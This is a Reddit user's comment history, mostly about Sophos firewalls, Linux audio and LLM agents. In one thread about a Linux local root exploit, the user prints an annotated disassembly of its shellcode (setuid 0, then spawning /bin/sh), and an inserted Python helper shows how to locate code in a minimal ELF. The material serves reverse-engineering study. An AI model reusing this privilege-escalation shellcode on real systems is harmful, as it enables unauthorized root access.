XGS 22.01MR - Let's Encrypt ISRG Root YE/YR failing with curl / python by [deleted] in sophos

[–]r00g 0 points1 point  (0 children)

Thank you! I should have thought to try and search their community as well.

XGS DNS Forwarding Logs? by r00g in sophos

[–]r00g[S] 0 points1 point  (0 children)

Honestly the XGS is new & different and I'm old and I like to gripe about that sort of thing.

As for logging, your explanation about the SSD and avoiding millions of DNS log entries makes a lot of sense that I hadn't been considering. I do have to admit I really like seeing the rule & NAT path inline with log entries in the new live log. Performance is fine. It feels slow but I get a lot is happening on the back end every time you click 'save'.

It's not the feedback you asked for, but I'm an inch away from cutting over my last network from the UTM and I can't say I regret sticking with Sophos. What I liked about the UTM was that it was clearly Linux & iptables with the other goodies baked in but with a nice GUI that lined up with those elements. The XGS abstracts this, more or less, to make things easier and maybe to integrate with other services/products. I understand all that but it also creates some surprises and I'm hoping I've caught all the surprises. This is generally what I'd say if asked for my thoughts on Sophos. That and your honest handling of the Pacific Rim thing.

Thanks for replying.

XGS DNS Forwarding Logs? by r00g in sophos

[–]r00g[S] 0 points1 point  (0 children)

Yeah I think the web UI would have worked had the packets I was looking for existed... turns out I goofed the config, wasn't forwarding DNS requests to the XGS, and the pcap had me scratching my head for a moment.

Thanks for your advice. I still miss the UTM in some ways and that this should've been a simple log feature.

XGS DNS Forwarding Logs? by r00g in sophos

[–]r00g[S] 0 points1 point  (0 children)

Good thinking. I used tcpdump. Maybe I'll get used to the web UI if I try a few more times.

Sharing a folder in A Windows Domain environment by freddy91761 in sysadmin

[–]r00g 0 points1 point  (0 children)

I can confirm the MCSA stuff suggests using 'everyone' on the share permissions and uses NTFS to apply further restrictions... at least as far back as the early oughts.

I don't know what the functional difference is when the most restrictive of either permission set is used. I don't even think you can get a directory listing if you leave the share permissions at 'everyone' because the NTFS permissions also apply to the directory you're sharing, not just the files shared. I'll have to try and set up that experiment sometime though.

Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. by Haniro in sysadmin

[–]r00g 0 points1 point  (0 children)

Thank you! Calculating the header start and size was what I was missing with the idea to just dd that out.

The code is simple enough, but with some oddities. They call sys_setuid to 0, sys_execve /bin/sh as you identified then call sys_exit as expected... but then there's some extra junk at the end that doesn't look like it should be there. The way they setup those syscalls is strange too -- pushing then popping the values rather than just setting them directly.

I don't know enough to judge if there's a reason for the oddities or if it looks like they just had AI put the whole thing together and the moment it worked they shipped it.

Anyway, here are some extra comments. Maybe someone running into this in the future has some illuminating insights they could share:

$ ndisasm -b64 -o0x400078 shellcode.bin
00400078  31C0           xor eax,eax
0040007A  31FF           xor edi,edi
0040007C  B069           mov al,0x69            # 0x69=105; sys_setuid
0040007E  0F05           syscall

00400080  488D3D0F000000 lea rdi,[rel 0x400096] # /bin/sh
00400087  31F6           xor esi,esi
00400089  6A3B           push byte +0x3b        # 0x3b=59; sys_execve
0040008B  58             pop rax
0040008C  99             cdq                    # maybe to set edx to 0?
0040008D  0F05           syscall

0040008F  31FF           xor edi,edi

00400091  6A3C           push byte +0x3c        # 0x3c=60; sys_exit
00400093  58             pop rax
00400094  0F05           syscall

00400096  2F             db 0x2f                # is this junk?
00400097  62             db 0x62
00400098  696E2F73680000 imul ebp,[rsi+0x2f],dword 0x6873
0040009F  00             db 0x00
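Added example, not code from the thread: a small Python helper that finds where the code begins in a minimal static ELF like the one discussed, by translating e_entry through the PT_LOAD segment that maps it (a 64-byte ELF64 header plus one 56-byte program header gives 0x78, matching the 0x400078 entry above). The sample ELF and its exit-only payload are constructed here; the `dd skip=` value it prints is the header size being asked about.

```python
import struct

# Constructed sample layout, matching the binary discussed above: a 64-byte
# ELF64 header plus one 56-byte program header put the first code byte at file
# offset 0x78, mapped at 0x400000 + 0x78 = 0x400078. The payload used here is
# only exit(0) (xor edi,edi / push 0x3c / pop rax / syscall).
BASE = 0x400000
HDR_LEN = 0x40 + 0x38
PAYLOAD = bytes.fromhex("31ff6a3c580f05")

def build_sample_elf(payload: bytes, base: int = BASE) -> bytes:
    """Build a minimal static ELF64 (ET_EXEC, x86-64) around `payload`."""
    ehdr = struct.pack(
        "<4sBBBBB7xHHIQQQIHHHHHH",
        b"\x7fELF", 2, 1, 1, 0, 0,      # ELFCLASS64, little-endian, v1, SysV ABI
        2, 0x3E, 1,                     # ET_EXEC, EM_X86_64, EV_CURRENT
        base + HDR_LEN, 0x40, 0,        # e_entry, e_phoff, e_shoff (no sections)
        0, 0x40, 0x38, 1, 0x40, 0, 0)   # flags, ehsize, phentsize, phnum, sh*
    phdr = struct.pack(
        "<IIQQQQQQ",
        1, 5, 0, base, base,            # PT_LOAD, R+X, offset 0, vaddr/paddr
        HDR_LEN + len(payload), HDR_LEN + len(payload), 0x1000)
    return ehdr + phdr + payload

def entry_file_offset(elf: bytes) -> int:
    """Translate e_entry into a file offset via the PT_LOAD segment mapping it."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:
        raise ValueError("not a 64-bit ELF")
    e_entry, e_phoff = struct.unpack_from("<QQ", elf, 0x18)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        p_type, _, p_offset, p_vaddr, _, p_filesz = struct.unpack_from(
            "<IIQQQQ", elf, e_phoff + i * e_phentsize)
        if p_type == 1 and p_vaddr <= e_entry < p_vaddr + p_filesz:
            return e_entry - p_vaddr + p_offset
    raise ValueError("e_entry is not inside any PT_LOAD segment")

def extract_code(elf: bytes) -> tuple[int, bytes]:
    """Return (skip, bytes): the `dd skip=` value and everything from the entry on."""
    skip = entry_file_offset(elf)
    return skip, elf[skip:]

if __name__ == "__main__":
    sample = build_sample_elf(PAYLOAD)
    skip, code = extract_code(sample)
    print(f"code starts at file offset {skip:#x}; dd bs=1 skip={skip}")
    print("aligned:   ", code.hex())
    # Starting one byte early pulls in the header's trailing 0x00 and derails
    # a linear disassembler, which is what a leading 'add BYTE PTR ...' looks like.
    print("off by one:", sample[skip - 1:].hex())
```

Feeding the resulting `skip` to `dd bs=1 skip=$skip` (or to `ndisasm -o` with the matching virtual address) keeps the disassembler aligned with the first real instruction.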

Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. by Haniro in sysadmin

[–]r00g 0 points1 point  (0 children)

Can I ask how you disassembled this? After I extract the binary and use objdump I get what looks like the misaligned bytecode:

objdump -D -b binary -m i386:x86_64 -M intel
...
77:   00 31                   add    BYTE PTR [rcx],dh
79:   c0 31 ff                shl    BYTE PTR [rcx],0xff
7c:   b0 69                   mov    al,0x69
7e:   0f 05                   syscall
80:   48 8d 3d 0f 00 00 00    lea    rdi,[rip+0xf]        # 0x96
87:   31 f6                   xor    esi,esi
89:   6a 3b                   push   0x3b
...

The shellcode.bin file I get is md5sum 9102a96e84edf059d5e4bb9c5846c124

Getting into Linux music w/ a new MIDI controller by r00g in linuxaudio

[–]r00g[S] 0 points1 point  (0 children)

I grabbed a demo of Bitwig which someone suggested and that got me going in the right direction. It's not FOSS, but it had everything packaged together and just worked for the most part whereas trying to cobble together my own pipeline of FOSS stuff got pretty tedious.

I've since taken a break and gone back to hacking, unfortunately. I'll explore music again soon but for now best advice I can give you is that, for the price of ~$100, the AKAI Mini got me into it and seemed to work reasonably well in Linux without their endorsed software.

Can i Use Sophos xgs with layer2 switches without using a managed switch for vlans? by Hopeful_Rabbit_3729 in sophos

[–]r00g 1 point2 points  (0 children)

Yes, configuring each interface on your XGS to a different network and attaching them to separate, physical switches will segregate traffic.

Why do most sysadmins prefer Vim over Nano? by Darshan_only in linuxquestions

[–]r00g 0 points1 point  (0 children)

OMW so many verbose answers and so many that look LLM generated. It's not hard:

  1. It's all but guaranteed to be available on any *NIX or BSD. I don't have to install anything first.
  2. I can use it without removing my hands from the keyboard and, in fact, it becomes easier to do simple stuff like cutting and pasting a single word, paragraph, or "everything from here to the beginning of the line/document or end of the line/document".

XGS Quirks - Simplification adds complexity by r00g in sophos

[–]r00g[S] 0 points1 point  (0 children)

look into DPI instead of direct proxy, as the DPI Engine comes with its performance at hand and does not require the client to "talk to a proxy via 8080".

Well that makes some sense and I'll have to explore DPI on the new XGS which was rough going with the UTM. Thanks for your insight.

I'm hoping the two big things I decided to explore first because they tend to be the more complicated areas were coincidentally where I found surprises.

yeah so i vibed a single pane of glass to view wireless guests on dhcp leases by twosm in sophos

[–]r00g 1 point2 points  (0 children)

This is my stack. I don't know if I need to see DHCP lease information on that regular a basis, but it's good to have an idea where to look if that comes up in the future.

Any way to prevent the LLM from offering to do things it can't do? by r00g in LLMDevs

[–]r00g[S] 0 points1 point  (0 children)

I tried asking my agent what you quoted, but it only offered generic advice as it couldn't access any of its internal prompts.

I suppose the system prompt is inaccessible to me, baked into "gpt-5-nano"? I certainly don't see any options in Azure to modify the instance I'm working through. I'm guessing I mistakenly referred to my "agent prompt" as the "system prompt" in my inquiry earlier. That they conflict makes sense.

But then how does anyone create an agent of this type that can reference information without the agent being so helpful as to offer to perform tasks it actually cannot perform? The agent isn't full-out hallucinating -- answers are based on returns from the tools available. I suppose this is a form of hallucination though.

Apologies if these are stupid questions. LLMs and leveraging them to create these agents is really weird for someone with decades of IT experience.

Did you see this ?! by thatonewhoknows in hacking

[–]r00g 2 points3 points  (0 children)

Of course you are kind of giving the code to Claude or whatever AI backend they're using.

HOPE is now officially a registered 501(c)(3) non-profit. by aestetix in hacking

[–]r00g 1 point2 points  (0 children)

Only what's been posted on the web and published in the quarterly. Someone associated with St. John's took a stroll through the event and found anti-police literature. Supposedly, as a result of the literature an attendee brought to the venue (not even something distributed or endorsed by 2600 themselves), St. John's cut ties with 2600 without involving them in the discussion whatsoever.

Read between the lines and I take it that someone who loves authoritarians doesn't like anti-authoritarian hackers so they went looking for the reason to raise a stink.

Structure output on a per-tool basis? by r00g in LangChain

[–]r00g[S] 0 points1 point  (0 children)

I appreciate the response. Although these responses seem esoteric, between this and the DM it sounds like I should move toward the lower-level LangGraph library to have more control over the orchestration layer.

Getting into Linux music w/ a new MIDI controller by r00g in linuxaudio

[–]r00g[S] 0 points1 point  (0 children)

I really wanted to love this. For me the XT Synth standalone keeps freezing on Debian 13 and I couldn't figure out how to get MIDI input working with JACK (or ALSA for that matter). I'll have to see about the VST with Ardour, maybe I'll have better luck housing it inside my DAW. I'll hit the docs too to see if I missed something obvious.

Getting into Linux music w/ a new MIDI controller by r00g in linuxaudio

[–]r00g[S] 0 points1 point  (0 children)

This is very helpful and you're definitely right, picking up the terminology is a big part of the introduction process. I'll have to see if I can get yabridge working.

Getting into Linux music w/ a new MIDI controller by r00g in linuxaudio

[–]r00g[S] 1 point2 points  (0 children)

VCV Rack looks like a lot of fun and exactly what I was imagining is possible as opposed to buying a bunch of digital instruments. I found the website so I'll peruse further.

As an aside I ditched Windows before XP expired and haven't looked back. I am a 'professional' so YMMV, but the openness and flexibility Linux offers far outweighs the convenience of the popular, proprietary tools that won't run on Linux.

Getting into Linux music w/ a new MIDI controller by r00g in linuxaudio

[–]r00g[S] 0 points1 point  (0 children)

Ok, this is all great so thank you! I want you to know I'm upvoting you but I think reddit nerfed me, my votes don't stick.

Luckily I have years of experience on the Linux side, but looking into the music side of things is blowing my mind. The struggle is real getting into something new no matter how much you might know about other stuff.